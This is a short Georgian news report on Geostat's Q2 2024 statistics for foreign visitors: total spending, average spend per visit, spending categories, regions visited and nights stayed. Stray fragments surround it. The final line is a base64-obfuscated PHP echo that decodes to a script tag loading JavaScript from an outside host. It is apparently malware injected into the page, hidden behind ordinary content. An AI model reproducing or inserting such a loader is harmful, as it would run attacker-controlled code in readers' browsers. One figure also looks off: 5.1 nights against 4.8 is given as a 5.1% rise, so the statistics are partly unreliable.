celsiusi
ავერსი შნაიდერი

საქსტატის უცხოელი ვიზიტორების სტატისტიკის მიხედვით, 2024 წლის II კვარტალში განხორციელებული ვიზიტებისას გაწეული ხარჯები 3.4 მილიარდ ლარს გაუტოლდა, რაც 2.7%-ით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე.

საპირისპიროდ, წლიურად 1.8%-ით შემცირდა ვიზიტზე საშუალო ხარჯი და 2 251.8 ლარი შეადგინა.

კატეგორიების მიხედვით, დანახარჯების უდიდესი ნაწილის, 35.1%, განთავსებაზე მოდის, რომელსაც 28%-იანი წილით საყიდლები მოსდევს.

აპრილ-ივნისის პერიოდში ვიზიტების ყველაზე დიდი ნაწილი (53.7%) განხორციელდა დასვენების, გართობისა და რეკრეაციის მიზნით.

ვიზიტების უმრავლესობა თბილისსა და აჭარის ავტონომიურ რესპუბლიკაზე მოდის შესაბამისად, 850.4 ათასი და 569.2 ათასი ვიზიტი.

II კვარტალში ვიზიტებისას გათეული ღამეების საშუალო რაოდენობამ 5.1 იყო, რაც 2023 წლის II კვარტალში დაფიქსირებულ მაჩვენებელზე (4.8 ღამე) 5.1%-ით მეტია. ვიზიტების 73.9% განმეორებითი ხასიათის იყო.

II კვარტალში საერთაშორისო ვიზიტორების მიერ განხორციელდა 1.2 მილიონი ტურისტული ვიზიტი, რაც 9.2%-ით მეტია წინა წლის ანალოგიური პერიოდის მაჩვენებელზე.

209
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");